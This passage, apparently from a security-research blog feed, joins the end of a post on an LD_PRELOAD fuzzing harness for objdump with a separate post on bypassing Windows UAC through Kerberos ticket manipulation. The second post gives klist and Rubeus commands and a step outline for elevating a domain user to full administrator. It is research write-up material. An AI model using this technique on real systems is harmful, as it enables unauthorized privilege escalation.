    int __xstat(int __ver, const char* __filename, struct stat* __stat_buf) {
        // Resolve the real __xstat() on demand and maybe multiple times!
        if (!real_xstat) {
            real_xstat = _resolve_symbol("__xstat");
        }
    
        // Assume the worst, always
        int ret = -1;
    
        // Special __ver value check to see if we're calling from constructor
        if (0x1337 == __ver) {
            // Patch back up the version value before sending to real xstat
            __ver = 1;
    
            ret = real_xstat(__ver, __filename, __stat_buf);
    
            // Set the real_xstat back to NULL
            real_xstat = NULL;
            return ret;
        }
    
        // Determine if we're stat'ing our fuzzing target
        if (!strcmp(__filename, FUZZ_TARGET)) {
            // Update our global stat struct
            st.st_size = *(size_t *)INPUT_SZ_ADDR;
    
            // Send it back to the caller, skip syscall
            memcpy(__stat_buf, &st, sizeof(struct stat));
            ret = 0;
        }
    
        // Just a normal stat, send to real xstat
        else {
            ret = real_xstat(__ver, __filename, __stat_buf);
        }
    
        return ret;
    }
    
    // Map memory to hold our inputs in memory and information about their size
    static void _create_mem_mappings(void) {
        void *result = NULL;
    
        // Map the page to hold the input size
        result = mmap(
            (void *)(INPUT_SZ_ADDR),
            sizeof(size_t),
            PROT_READ | PROT_WRITE,
            MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED,
            0,
            0
        );
        if ((MAP_FAILED == result) || (result != (void *)INPUT_SZ_ADDR)) {
            printf("Err mapping INPUT_SZ_ADDR, mapped @ %p\n", result);
            exit(-1);
        }
    
        // Let's actually initialize the value at the input size location as well
        *(size_t *)INPUT_SZ_ADDR = 0;
    
        // Map the pages to hold the input contents
        result = mmap(
            (void *)(INPUT_ADDR),
            (size_t)(MAX_INPUT_SZ),
            PROT_READ | PROT_WRITE,
            MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED,
            0,
            0
        );
        if ((MAP_FAILED == result) || (result != (void *)INPUT_ADDR)) {
            printf("Err mapping INPUT_ADDR, mapped @ %p\n", result);
            exit(-1);
        }
    
        // Init the value
        memset((void *)INPUT_ADDR, 0, (size_t)MAX_INPUT_SZ);
    }
    
    // Create a "legit" stat struct globally to pass to callers
    static void _setup_stat_struct(void) {
        int result = __xstat(0x1337, FUZZ_TARGET, &st);
        if (-1 == result) {
            printf("Error creating stat struct for '%s' during load\n", FUZZ_TARGET);
        }
    }
    
    // Used for testing, load /bin/ed into the input buffer and update its size info
    #ifdef TEST
    static void _test_func(void) {    
        // Open TEST_FILE for reading
        int fd = open(TEST_FILE, O_RDONLY);
        if (-1 == fd) {
            printf("Failed to open '%s' during test\n", TEST_FILE);
            exit(-1);
        }
    
        // Attempt to read max input buf size
        ssize_t bytes = read(fd, (void*)INPUT_ADDR, (size_t)MAX_INPUT_SZ);
        close(fd);
    
        // Update the input size
        *(size_t *)INPUT_SZ_ADDR = (size_t)bytes;
    }
    #endif
    
    // Routine to be called when our shared object is loaded
    __attribute__((constructor)) static void _hook_load(void) {
        // Create memory mappings to hold our input and information about its size
        _create_mem_mappings();
    
        // Setup global "legit" stat struct
        _setup_stat_struct();
    
        // If we're testing, load /bin/ed up into our input buffer and update size
    #ifdef TEST
        _test_func();
    #endif
    }
    

    Now if we run this under strace, we notice that our two stat() calls are conspicuously missing.

    close(3)                                = 0
    openat(AT_FDCWD, "fuzzme", O_RDONLY)    = 3
    fcntl(3, F_GETFD)                       = 0
    fcntl(3, F_SETFD, FD_CLOEXEC)           = 0
    

    We no longer see the stat() calls before the openat() and the program does not break in any significant way. So this hook seems to be working appropriately. We now need to handle the openat() and make sure we don’t actually interact with our input file, but instead trick objdump to interact with our input in memory.

    Finding a Way to Hook openat()

    My non-expert intuition tells me there are probably a few ways in which a libc function could end up calling openat() under the hood. Those ways might include the wrappers open() as well as fopen(). We also need to be mindful of their 64-bit variants as well (open64(), fopen64()). I decided to try the fopen() hooks first:

    // Declare prototype for the real fopen and its friend fopen64 
    typedef FILE* (*fopen_t)(const char* pathname, const char* mode);
    fopen_t real_fopen = NULL;
    
    typedef FILE* (*fopen64_t)(const char* pathname, const char* mode);
    fopen64_t real_fopen64 = NULL;
    
    ...
    
    // Exploratory hooks to see if we're using fopen() related functions to open
    // our input file
    FILE* fopen(const char* pathname, const char* mode) {
        printf("** fopen() called for '%s'\n", pathname);
        exit(0);
    }
    
    FILE* fopen64(const char* pathname, const char* mode) {
        printf("** fopen64() called for '%s'\n", pathname);
        exit(0);
    }
    

    If we compile and run our exploratory hooks, we get the following output:

    h0mbre@ubuntu:~/blogpost$ LD_PRELOAD=/home/h0mbre/blogpost/blog_harness.so objdump -D fuzzme
    ** fopen64() called for 'fuzzme'
    

    Bingo, dino DNA.

    So now we can flesh that hooked function out a bit to behave how we want.

    Refining an fopen64() Hook

    The definition for fopen64() is: `FILE *fopen64(const char *restrict pathname, const char *restrict mode);`. The returned FILE * poses a slight problem for us because it is an opaque data structure that is not meant to be understood by the caller. Which is to say, the caller is not meant to access any members of this data structure or worry about its layout in any way. You're just supposed to use the returned FILE * as an object to pass to other functions, such as fclose(). The system deals with the data structure inside those related functions so that programmers don’t have to worry about a specific implementation.

    We don’t actually know how the returned FILE * will be used; it may not be used at all, or it may be passed to a function such as fread(). So we need a way to return a convincing FILE * data structure to the caller that is actually built from our input in memory and NOT from the input file. Luckily, there is a libc function called fmemopen() which behaves very similarly to fopen() and also returns a FILE *. So we can go ahead and create a FILE * built from our in-memory input to return to callers of fopen64() who ask for fuzzme. Shoutout to @domenuk for showing me fmemopen(), I had never come across it before.

    There is one key difference though. fopen() will actually obtain a file descriptor for the underlying file, and fmemopen(), since it is not actually opening a file, will not. So somewhere in the FILE * data structure there is a file descriptor for the underlying file if it came from fopen(), and there isn’t one if it came from fmemopen(). This is very important, as functions such as int fileno(FILE *stream) can parse a FILE * and return its underlying file descriptor to the caller. objdump may want to do this for some reason and we need to be able to robustly handle it. So we need a way to know if someone is trying to use our faked FILE *’s underlying file descriptor.

    My idea for this was to simply find the struct member containing the file descriptor in the FILE * returned from fmemopen() and change it to be something ridiculous like 1337 so that if objdump ever tried to use that file descriptor we would know the source of it and could try to hook any interactions with the file descriptor. So now our fopen64() hook should look as follows:

    // Our fopen hook, return a FILE* to the caller, also, if we are opening our
    // target make sure we're not able to write to the file
    FILE* fopen64(const char* pathname, const char* mode) {
        // Resolve symbol on demand and only once
        if (NULL == real_fopen64) {
            real_fopen64 = _resolve_symbol("fopen64");
        }
    
        // Check to see what file we're opening
        FILE* ret = NULL;
        if (!strcmp(FUZZ_TARGET, pathname)) {
            // We're trying to open our file, make sure it's a read-only mode
            if (strcmp(mode, "r")) {
                printf("Attempt to open fuzz-target in illegal mode: '%s'\n", mode);
                exit(-1);
            }
    
            // Open shared memory FILE* and return to caller
            ret = fmemopen((void*)INPUT_ADDR, *(size_t*)INPUT_SZ_ADDR, mode);
            
            // Make sure we've never fopen()'d our fuzzing target before
            if (faked_fp) {
                printf("Attempting to fopen64() fuzzing target more than once\n");
                exit(-1);
            }
    
            // Update faked_fp
            faked_fp = ret;
    
            // Change the filedes to something we know
            ret->_fileno = 1337;
        }
    
        // We're not opening our file, send to regular fopen
        else {
            ret = real_fopen64(pathname, mode);
        }
    
        // Return FILE stream ptr to caller
        return ret;
    }
    

    You can see we:

    1. Resolve the symbol location if it hasn’t been yet
    2. Check to see if we’re being called on our fuzzing target input file
    3. Call fmemopen() and open the memory buffer where our current input is in memory along with the input’s size

    You may also notice a few safety checks to make sure things don’t go unnoticed. We have a global variable FILE *faked_fp, initialized to NULL, which lets us know if we’ve ever opened our input more than once (it wouldn’t be NULL anymore on subsequent attempts to open it).

    We also do a check on the mode argument to make sure we’re getting a read-only FILE * back. We don’t want objdump to alter our input or write to it in any way and if it tries to, we need to know about it.

    Running our shared object at this point nets us the following output:

    h0mbre@ubuntu:~/blogpost$ LD_PRELOAD=/home/h0mbre/blogpost/blog_harness.so objdump -D fuzzme
    objdump: fuzzme: Bad file descriptor
    

    My spidey-sense is telling me something tried to interact with a file descriptor of 1337. Let’s run again under strace and see what happens.

    h0mbre@ubuntu:~/blogpost$ strace -E LD_PRELOAD=/home/h0mbre/blogpost/blog_harness.so objdump -D fuzzme > /tmp/output.txt
    

    In the output, we can see some syscalls to fcntl() and fstat() both being called with a file descriptor of 1337 which obviously doesn’t exist in our objdump process, so we’ve been able to find the problem.

    fcntl(1337, F_GETFD)                    = -1 EBADF (Bad file descriptor)
    prlimit64(0, RLIMIT_NOFILE, NULL, {rlim_cur=4*1024, rlim_max=4*1024}) = 0
    fstat(1337, 0x7fff4bf54c90)             = -1 EBADF (Bad file descriptor)
    fstat(1337, 0x7fff4bf54bf0)             = -1 EBADF (Bad file descriptor)
    

    As we’ve already learned, there is no direct export in libc for fstat(); it’s one of those weird ones like stat(), so we actually have to hook __fxstat(). Let’s try hooking that to see if it gets called for our 1337 file descriptor. The hook function will look like this to start:

    // Declare prototype for the real __fxstat
    typedef int (*__fxstat_t)(int __ver, int __filedesc, struct stat *__stat_buf);
    __fxstat_t real_fxstat = NULL;
    
    ...
    
    // Hook for __fxstat
    int __fxstat (int __ver, int __filedesc, struct stat *__stat_buf) {
        printf("** __fxstat() called for __filedesc: %d\n", __filedesc);
        exit(0);
    }
    

    Now we also still have that fcntl() to deal with. Luckily that hook is straightforward: if someone asks for F_GETFD, aka the flags associated with that special 1337 file descriptor, we’ll simply return O_RDONLY as those were the flags it was “opened” with, and we’ll just panic for now if someone calls it for a different file descriptor. This hook looks like this:

    // Declare prototype for the real __fcntl
    typedef int (*fcntl_t)(int fildes, int cmd, ...);
    fcntl_t real_fcntl = NULL;
    
    ...
    
    // Hook for fcntl
    int fcntl(int fildes, int cmd, ...) {
        // Resolve fcntl symbol if needed
        if (NULL == real_fcntl) {
            real_fcntl = _resolve_symbol("fcntl");
        }
    
        if (fildes == 1337) {
            return O_RDONLY;
        }
    
        else {
            printf("** fcntl() called for real file descriptor\n");
            exit(0);
        }
    }
    

    Running this under strace now, the fcntl() call is absent as we would expect:

    openat(AT_FDCWD, "/usr/lib/x86_64-linux-gnu/gconv/gconv-modules.cache", O_RDONLY) = 3
    fstat(3, {st_mode=S_IFREG|0644, st_size=26376, ...}) = 0
    mmap(NULL, 26376, PROT_READ, MAP_SHARED, 3, 0) = 0x7ff61d331000
    close(3)                                = 0
    prlimit64(0, RLIMIT_NOFILE, NULL, {rlim_cur=4*1024, rlim_max=4*1024}) = 0
    fstat(1, {st_mode=S_IFREG|0664, st_size=0, ...}) = 0
    write(1, "** __fxstat() called for __filed"..., 42) = 42
    exit_group(0)                           = ?
    +++ exited with 0 +++
    

    Now we can flesh out our __fxstat() hook with some logic. The caller is hoping to retrieve a stat struct for our fuzzing target fuzzme by passing the special file descriptor 1337. Luckily, we have our global stat struct that we can return after we update its size to match that of the current input in memory (as tracked by us and the fuzzer via the value at INPUT_SZ_ADDR). So if called, we simply update our stat struct size and memcpy our struct into their *__stat_buf. Our complete hook now looks like this:

    // Hook for __fxstat
    int __fxstat (int __ver, int __filedesc, struct stat *__stat_buf) {
        // Resolve the real fxstat
        if (NULL == real_fxstat) {
            real_fxstat = _resolve_symbol("__fxstat");
        }
    
        int ret = -1;
    
        // Check to see if we're stat'ing our fuzz target
        if (1337 == __filedesc) {
            // Patch the global struct with current input size
            st.st_size = *(size_t*)INPUT_SZ_ADDR;
    
            // Copy global stat struct back to caller
            memcpy(__stat_buf, &st, sizeof(struct stat));
            ret = 0;
        }
    
        // Normal stat, send to real fxstat
        else {
            ret = real_fxstat(__ver, __filedesc, __stat_buf);
        }
    
        return ret;
    }
    

    Now if we run this, we actually don’t break, and objdump is able to exit cleanly under strace.

    Wrapping Up

    To test whether or not we have done a fair job, we will output objdump -D fuzzme to a file, then run the same command with our harness shared object loaded and output that to a second file. Lastly, we’ll run objdump -D /bin/ed and output to a third file to see if our harness created the same output as disassembling /bin/ed directly.

    h0mbre@ubuntu:~/blogpost$ objdump -D fuzzme > /tmp/fuzzme_original.txt      
    h0mbre@ubuntu:~/blogpost$ LD_PRELOAD=/home/h0mbre/blogpost/blog_harness.so objdump -D fuzzme > /tmp/harness.txt 
    h0mbre@ubuntu:~/blogpost$ objdump -D /bin/ed > /tmp/ed.txt
    

    Then we sha1sum the files:

    h0mbre@ubuntu:~/blogpost$ sha1sum /tmp/fuzzme_original.txt /tmp/harness.txt /tmp/ed.txt 
    938518c86301ab00ddf6a3ef528d7610fa3fd05a  /tmp/fuzzme_original.txt
    add4e6c3c298733f48fbfe143caee79445c2f196  /tmp/harness.txt
    10454308b672022b40f6ce5e32a6217612b462c8  /tmp/ed.txt
    

    We actually get three different hashes. We wanted the harness output and the /bin/ed output to be the same, since /bin/ed is the input we loaded into memory.

    h0mbre@ubuntu:~/blogpost$ ls -laht /tmp
    total 14M
    drwxrwxrwt 28 root   root   128K Apr  3 08:44 .
    -rw-rw-r--  1 h0mbre h0mbre 736K Apr  3 08:43 ed.txt
    -rw-rw-r--  1 h0mbre h0mbre 736K Apr  3 08:43 harness.txt
    -rw-rw-r--  1 h0mbre h0mbre 2.2M Apr  3 08:42 fuzzme_original.txt
    

    Ah, they are the same length at least; that must mean there is a subtle difference, and diff shows us why the hashes aren’t the same:

    h0mbre@ubuntu:~/blogpost$ diff /tmp/ed.txt /tmp/harness.txt 
    2c2
    < /bin/ed:     file format elf64-x86-64
    ---
    > fuzzme:     file format elf64-x86-64
    

    The name of the file in the argv[] array is different, so that’s the only difference. In the end we were able to feed objdump an input file, but have it actually take input from an in-memory buffer in our harness.

    One more thing: we actually forgot that objdump closes our file, didn’t we! So I went ahead and added a quick fclose() hook. We wouldn’t have any problems if fclose() just wanted to free the heap memory associated with our fmemopen()-returned FILE *; however, it would also probably try to call close() on that wonky file descriptor as well, and we don’t want that. It might not even matter in the end, I just want to be safe. It’s up to the reader to experiment and see what changes. The imaginary fuzzer should restore the FILE *’s heap memory anyways during its snapshot restoration routine.

    Conclusion

    There are a million different ways to accomplish this goal, I just wanted to walk you through my thought process. There are actually a lot of cool things you can do with this harness. One thing I’ve done is hook malloc() to fail on large allocations so that I don’t waste fuzzing cycles on things that will eventually time out. You can also create an atexit() choke point so that no matter what, the program executes your atexit() handler every time it exits, which can be useful for snapshot resets if the program can take multiple exit paths, as you only have to cover the one exit point.

    Hopefully this was useful to some! The complete code to the harness is below, happy fuzzing!

    /* 
    Compiler flags: 
    gcc -shared -Wall -Werror -fPIC blog_harness.c -o blog_harness.so -ldl
    */
    
    #define _GNU_SOURCE     /* dlsym */
    #include <stdio.h> /* printf */
    #include <sys/stat.h> /* stat */
    #include <stdlib.h> /* exit */
    #include <unistd.h> /* __xstat, __fxstat */
    #include <dlfcn.h> /* dlsym and friends */
    #include <sys/mman.h> /* mmap */
    #include <string.h> /* memset */
    #include <fcntl.h> /* open */
    
    // Filename of the input file we're trying to emulate
    #define FUZZ_TARGET     "fuzzme"
    
    // Definitions for our in-memory inputs 
    #define INPUT_SZ_ADDR   0x1336000
    #define INPUT_ADDR      0x1337000
    #define MAX_INPUT_SZ    (1024 * 1024)
    
    // For testing purposes, we read /bin/ed into our input buffer to simulate
    // what the fuzzer would do
    #define  TEST_FILE      "/bin/ed"
    
    // Our "legit" global stat struct
    struct stat st;
    
    // FILE * returned to callers of fopen64() 
    FILE *faked_fp = NULL;
    
    // Declare a prototype for the real stat as a function pointer
    typedef int (*__xstat_t)(int __ver, const char *__filename, struct stat *__stat_buf);
    __xstat_t real_xstat = NULL;
    
    // Declare prototype for the real fopen and its friend fopen64 
    typedef FILE* (*fopen_t)(const char* pathname, const char* mode);
    fopen_t real_fopen = NULL;
    
    typedef FILE* (*fopen64_t)(const char* pathname, const char* mode);
    fopen64_t real_fopen64 = NULL;
    
    // Declare prototype for the real __fxstat
    typedef int (*__fxstat_t)(int __ver, int __filedesc, struct stat *__stat_buf);
    __fxstat_t real_fxstat = NULL;
    
    // Declare prototype for the real __fcntl
    typedef int (*fcntl_t)(int fildes, int cmd, ...);
    fcntl_t real_fcntl = NULL;
    
    // Returns memory address of *next* location of symbol in library search order
    static void *_resolve_symbol(const char *symbol) {
        // Clear previous errors
        dlerror();
    
        // Get symbol address
        void* addr = dlsym(RTLD_NEXT, symbol);
    
        // Check for error
        char* err = NULL;
        err = dlerror();
        if (err) {
            addr = NULL;
            printf("** Err resolving '%s' addr: %s\n", symbol, err);
            exit(-1);
        }
        
        return addr;
    }
    
    // Hook for __xstat 
    int __xstat(int __ver, const char* __filename, struct stat* __stat_buf) {
        // Resolve the real __xstat() on demand and maybe multiple times!
        if (!real_xstat) {
            real_xstat = _resolve_symbol("__xstat");
        }
    
        // Assume the worst, always
        int ret = -1;
    
        // Special __ver value check to see if we're calling from constructor
        if (0x1337 == __ver) {
            // Patch back up the version value before sending to real xstat
            __ver = 1;
    
            ret = real_xstat(__ver, __filename, __stat_buf);
    
            // Set the real_xstat back to NULL
            real_xstat = NULL;
            return ret;
        }
    
        // Determine if we're stat'ing our fuzzing target
        if (!strcmp(__filename, FUZZ_TARGET)) {
            // Update our global stat struct
            st.st_size = *(size_t *)INPUT_SZ_ADDR;
    
            // Send it back to the caller, skip syscall
            memcpy(__stat_buf, &st, sizeof(struct stat));
            ret = 0;
        }
    
        // Just a normal stat, send to real xstat
        else {
            ret = real_xstat(__ver, __filename, __stat_buf);
        }
    
        return ret;
    }
    
    // Exploratory hooks to see if we're using fopen() related functions to open
    // our input file
    FILE* fopen(const char* pathname, const char* mode) {
        printf("** fopen() called for '%s'\n", pathname);
        exit(0);
    }
    
    // Our fopen hook, return a FILE* to the caller, also, if we are opening our
    // target make sure we're not able to write to the file
    FILE* fopen64(const char* pathname, const char* mode) {
        // Resolve symbol on demand and only once
        if (NULL == real_fopen64) {
            real_fopen64 = _resolve_symbol("fopen64");
        }
    
        // Check to see what file we're opening
        FILE* ret = NULL;
        if (!strcmp(FUZZ_TARGET, pathname)) {
            // We're trying to open our file, make sure it's a read-only mode
            if (strcmp(mode, "r")) {
                printf("** Attempt to open fuzz-target in illegal mode: '%s'\n", mode);
                exit(-1);
            }
    
            // Open shared memory FILE* and return to caller
            ret = fmemopen((void*)INPUT_ADDR, *(size_t*)INPUT_SZ_ADDR, mode);
            
            // Make sure we've never fopen()'d our fuzzing target before
            if (faked_fp) {
                printf("** Attempting to fopen64() fuzzing target more than once\n");
                exit(-1);
            }
    
            // Update faked_fp
            faked_fp = ret;
    
            // Change the filedes to something we know
            ret->_fileno = 1337;
        }
    
        // We're not opening our file, send to regular fopen
        else {
            ret = real_fopen64(pathname, mode);
        }
    
        // Return FILE stream ptr to caller
        return ret;
    }
    
    // Hook for __fxstat
    int __fxstat (int __ver, int __filedesc, struct stat *__stat_buf) {
        // Resolve the real fxstat
        if (NULL == real_fxstat) {
            real_fxstat = _resolve_symbol("__fxstat");
        }
    
        int ret = -1;
    
        // Check to see if we're stat'ing our fuzz target
        if (1337 == __filedesc) {
            // Patch the global struct with current input size
            st.st_size = *(size_t*)INPUT_SZ_ADDR;
    
            // Copy global stat struct back to caller
            memcpy(__stat_buf, &st, sizeof(struct stat));
            ret = 0;
        }
    
        // Normal stat, send to real fxstat
        else {
            ret = real_fxstat(__ver, __filedesc, __stat_buf);
        }
    
        return ret;
    }
    
    // Hook for fcntl
    int fcntl(int fildes, int cmd, ...) {
        // Resolve fcntl symbol if needed
        if (NULL == real_fcntl) {
            real_fcntl = _resolve_symbol("fcntl");
        }
    
        if (fildes == 1337) {
            return O_RDONLY;
        }
    
        else {
            printf("** fcntl() called for real file descriptor\n");
            exit(0);
        }
    }
    
    // Map memory to hold our inputs in memory and information about their size
    static void _create_mem_mappings(void) {
        void *result = NULL;
    
        // Map the page to hold the input size
        result = mmap(
            (void *)(INPUT_SZ_ADDR),
            sizeof(size_t),
            PROT_READ | PROT_WRITE,
            MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED,
            0,
            0
        );
        if ((MAP_FAILED == result) || (result != (void *)INPUT_SZ_ADDR)) {
            printf("** Err mapping INPUT_SZ_ADDR, mapped @ %p\n", result);
            exit(-1);
        }
    
        // Let's actually initialize the value at the input size location as well
        *(size_t *)INPUT_SZ_ADDR = 0;
    
        // Map the pages to hold the input contents
        result = mmap(
            (void *)(INPUT_ADDR),
            (size_t)(MAX_INPUT_SZ),
            PROT_READ | PROT_WRITE,
            MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED,
            0,
            0
        );
        if ((MAP_FAILED == result) || (result != (void *)INPUT_ADDR)) {
            printf("** Err mapping INPUT_ADDR, mapped @ %p\n", result);
            exit(-1);
        }
    
        // Init the value
        memset((void *)INPUT_ADDR, 0, (size_t)MAX_INPUT_SZ);
    }
    
    // Create a "legit" stat struct globally to pass to callers
    static void _setup_stat_struct(void) {
        int result = __xstat(0x1337, FUZZ_TARGET, &st);
        if (-1 == result) {
            printf("** Err creating stat struct for '%s' during load\n", FUZZ_TARGET);
        }
    }
    
    // Used for testing, load /bin/ed into the input buffer and update its size info
    #ifdef TEST
    static void _test_func(void) {    
        // Open TEST_FILE for reading
        int fd = open(TEST_FILE, O_RDONLY);
        if (-1 == fd) {
            printf("** Failed to open '%s' during test\n", TEST_FILE);
            exit(-1);
        }
    
        // Attempt to read max input buf size
        ssize_t bytes = read(fd, (void*)INPUT_ADDR, (size_t)MAX_INPUT_SZ);
        close(fd);
    
        // Update the input size
        *(size_t *)INPUT_SZ_ADDR = (size_t)bytes;
    }
    #endif
    
    // Routine to be called when our shared object is loaded
    __attribute__((constructor)) static void _hook_load(void) {
        // Create memory mappings to hold our input and information about its size
        _create_mem_mappings();
    
        // Setup global "legit" stat struct
        _setup_stat_struct();
    
        // If we're testing, load /bin/ed up into our input buffer and update size
    #ifdef TEST
        _test_func();
    #endif
    }
    

    Bypassing UAC in the most Complex Way Possible!

    20 March 2022 at 09:52

While it's not something I spend much time on, finding a new way to bypass UAC is always amusing. When reading through some of the features of the Rubeus tool I realised that there was a possible way of abusing Kerberos to bypass UAC, well on domain joined systems at least. It's unclear whether this has been documented before; this post seems to discuss something similar, but it relies on performing the UAC bypass from another system, whereas what I'm going to describe works locally. Even if the technique has been described before, I'm not sure it's been documented how it works under the hood.

    The Background!

Let's start with how the system prevents you from bypassing the most pointless security feature ever. By default LSASS will filter any network authentication tokens to remove admin privileges if the user is a local administrator. However there's an important exception: if the user is a domain user and a local administrator then LSASS will allow the network authentication to use the full administrator token. This is a problem if, say, you're using Kerberos to authenticate locally. Wouldn't this be a trivial UAC bypass? Just authenticate to a local service as a domain user and you'd get the network token which would bypass the filtering?

Well no, Kerberos has specific additions to block this attack vector. If I was being charitable I'd say this behaviour also ensures some level of safety. If you're not running with the admin token then accessing, say, the SMB loopback interface shouldn't suddenly grant you administrator privileges through which you might accidentally destroy your system.

    Back in January last year I read a post from Steve Syfuhs of Microsoft on how Kerberos prevents this local UAC bypass. The TL;DR; is when a user wants to get a Kerberos ticket for a service LSASS will send a TGS-REQ request to the KDC. In the request it'll embed some security information which indicates the user is local. This information will be embedded in the generated ticket. 

When that ticket is used to authenticate to the same system Kerberos can extract the information and see if it matches one it knows about. If so it'll take that information and realize that the user is not elevated and filter the token appropriately. Unfortunately, much as I enjoy Steve's posts, this one was especially light on details. I guess I'd have to track down how it works myself. Let's dump the contents of a Kerberos ticket and see if we can see what could be the ticket information:

    PS> $c = New-LsaCredentialHandle -Package 'Kerberos' -UseFlag Outbound
    PS> $x = New-LsaClientContext -CredHandle $c -Target HOST/$env:COMPUTERNAME
PS> $key = Get-KerberosKey -HexKey 'XXX' -KeyType AES256_CTS_HMAC_SHA1_96 -Principal $env:COMPUTERNAME
    PS> $u = Unprotect-LsaAuthToken -Token $x.Token -Key $key
    PS> Format-LsaAuthToken $u

    <KerberosV5 KRB_AP_REQ>
    Options         : None
    <Ticket>
    Ticket Version  : 5
    ...

    <Authorization Data - KERB_AD_RESTRICTION_ENTRY>
    Flags           : LimitedToken
    Integrity Level : Medium
    Machine ID      : 6640665F...

    <Authorization Data - KERB_LOCAL>
    Security Context: 60CE03337E01000025FC763900000000

I've highlighted the two ones of interest, the KERB-AD-RESTRICTION-ENTRY and the KERB-LOCAL entry. Of course I didn't guess these names, these are sort of documented in the Microsoft Kerberos Protocol Extensions (MS-KILE) specification. The KERB_AD_RESTRICTION_ENTRY is most obviously of interest, it contains both the words "LimitedToken" and a "Medium" integrity level.

    When accepting a Kerberos AP-REQ from a network client via SSPI the Kerberos module in LSASS will call the LSA function LsaISetSupplementalTokenInfo to apply the information from KERB-AD-RESTRICTION-ENTRY to the token if needed. The pertinent code is roughly the following:

    NTSTATUS LsaISetSupplementalTokenInfo(PHANDLE phToken, 
                            PLSAP_TOKEN_INFO_INTEGRITY pTokenInfo) {
      // ...
  BOOL bLoopback = FALSE;
  BOOL bFilterToken = FALSE;

      if (!memcmp(&LsapGlobalMachineID, pTokenInfo->MachineID,
           sizeof(LsapGlobalMachineID))) {
        bLoopback = TRUE;
      }

      if (LsapGlobalFilterNetworkAuthenticationTokens) {
        if (pTokenInfo->Flags & LimitedToken) {
          bFilterToken = TRUE;
        }
      }

      PSID user = GetUserSid(*phToken);
      if (!RtlEqualPrefixSid(LsapAccountDomainMemberSid, user)
        || LsapGlobalLocalAccountTokenFilterPolicy 
        || NegProductType == NtProductLanManNt) {
        if ( !bFilterToken && !bLoopback )
          return STATUS_SUCCESS;
      }

      /// Filter token if needed and drop integrity level.
    }

I've highlighted the three main checks in this function. The first compares the MachineID field of the KERB-AD-RESTRICTION-ENTRY with the one stored in LSASS; if they match then the bLoopback flag is set. Then it checks an AFAIK undocumented LSA flag which filters all network tokens, at which point it'll check for the LimitedToken flag and set the bFilterToken flag accordingly. This filtering mode defaults to off, so in general bFilterToken won't be set.

Finally the code queries the newly created token's user SID and checks if any of the following are true:
    • The user SID is not a member of the local account domain.
    • The LocalAccountTokenFilterPolicy LSA policy is non-zero, which disables the local account filtering.
    • The product type is NtProductLanManNt, which actually corresponds to a domain controller.
If any of these are true then, as long as the token information doesn't indicate loopback and filtering isn't being forced, the function will return success and no filtering will take place. Therefore, in a default installation, whether a domain user is filtered comes down to whether the machine ID matches or not.

    For the integrity level, if filtering is taking place then it will be dropped to the value in the KERB-AD-RESTRICTION-ENTRY authentication data. However it won't increase the integrity level above what the created token has by default, so this can't be abused to get System integrity.

Note Kerberos will call LsaISetSupplementalTokenInfo with the KERB-AD-RESTRICTION-ENTRY authentication data from the ticket in the AP-REQ first. If that doesn't exist then it'll try calling it with the entry from the authenticator. If neither the ticket nor the authenticator has an entry then it will never be called. How can we remove these values?

    Well, about that!

Okay, how can we abuse this to bypass UAC? Assuming you're authenticated as a domain user, the funniest way to abuse it is to get the machine ID check to fail. How would we do that? The LsapGlobalMachineID value is a random value generated when LSASS starts up. We can abuse the fact that if you query the user's local Kerberos ticket cache it will return the session key for service tickets even if you're not an administrator (it won't return TGT session keys by default).

    Therefore one approach is to generate a service ticket for the local system, save the resulting KRB-CRED to disk, reboot the system to get LSASS to reinitialize and then when back on the system reload the ticket. This ticket will now have a different machine ID and therefore Kerberos will ignore the restrictions entry. You could do it with the builtin klist and Rubeus with the following commands:

    PS> klist get RPC/$env:COMPUTERNAME
    PS> Rubeus.exe /dump /server:$env:COMPUTERNAME /nowrap
    ... Copy the base64 ticket to a file.

    Reboot then:

    PS> Rubeus.exe ptt /ticket:<BASE64 TICKET> 

    You can use Kerberos authentication to access the SCM over named pipes or TCP using the RPC/HOSTNAME SPN.  Note the Win32 APIs for the SCM always use Negotiate authentication which throws a spanner in the works, but there are alternative RPC clients ;-) While LSASS will add a valid restrictions entry to the authenticator in the AP-REQ it won't be used as the one in the ticket will be used first which will fail to apply due to the different machine ID.

The other approach is to generate our own ticket, but won't we need credentials for that? There's a trick, I believe discovered by Benjamin Delpy and put into kekeo, that allows you to abuse unconstrained delegation to get a local TGT with a session key. With this TGT you can generate your own service tickets, so you can do the following:
    1. Query for the user's TGT using the delegation trick.
    2. Make a request to the KDC for a new service ticket for the local machine using the TGT. Add a KERB-AD-RESTRICTION-ENTRY but fill in a bogus machine ID.
    3. Import the service ticket into the cache.
    4. Access the SCM to bypass UAC.
Ultimately this is a reasonable amount of code for a UAC bypass, at least compared to just changing an environment variable. However, you can probably bodge it together using existing tools such as kekeo and Rubeus, but I'm not going to release a turn key tool to do this, you're on your own :-)

    Didn't you forget KERB-LOCAL?

What is the purpose of KERB-LOCAL? It's a way of reusing the local user's credentials; this is similar to NTLM loopback where LSASS is able to determine that the call is actually from a locally authenticated user and use their interactive token. The value passed in the ticket and authenticator can be checked against a list of known credentials in the Kerberos package and if there's a match the existing token will be used.

Would this not always eliminate the need for filtering the token based on the KERB-AD-RESTRICTION-ENTRY value? It seems that this behavior is used very infrequently due to how it's designed. First it only works if the accepting server is using the Negotiate package, it doesn't work if using the Kerberos package directly (sort of...). That's usually not an impediment as most local services use Negotiate anyway for convenience. 

    The real problem is that as a rule if you use Negotiate to the local machine as a client it'll select NTLM as the default. This will use the loopback already built into NTLM rather than Kerberos so this feature won't be used. Note that even if NTLM is disabled globally on the domain network it will still work for local loopback authentication. I guess KERB-LOCAL was added for feature parity with NTLM.

    Going back to the formatted ticket at the start of the blog what does the KERB-LOCAL value mean? It can be unpacked into two 64bit values, 0x17E3303CE60 and 0x3976FC25. The first value is the heap address of the KERB_CREDENTIAL structure in LSASS's heap!! The second value is the ticket count when the KERB-LOCAL structure was created.

Fortunately LSASS doesn't just dereference the credentials pointer, it must be in the list of valid credential structures. But the fact that this value isn't blinded or doesn't reference a randomly generated value seems a mistake, as heap addresses would be fairly easy to brute force. Of course it's not quite so simple, Kerberos does verify that the SID in the ticket's PAC matches the SID in the credentials so you can't just spoof the SYSTEM session, but well, I'll leave that as a thought to be going on with.

    Hopefully this gives some more insight into how this feature works and some fun you can have trying to bypass UAC in a new way.

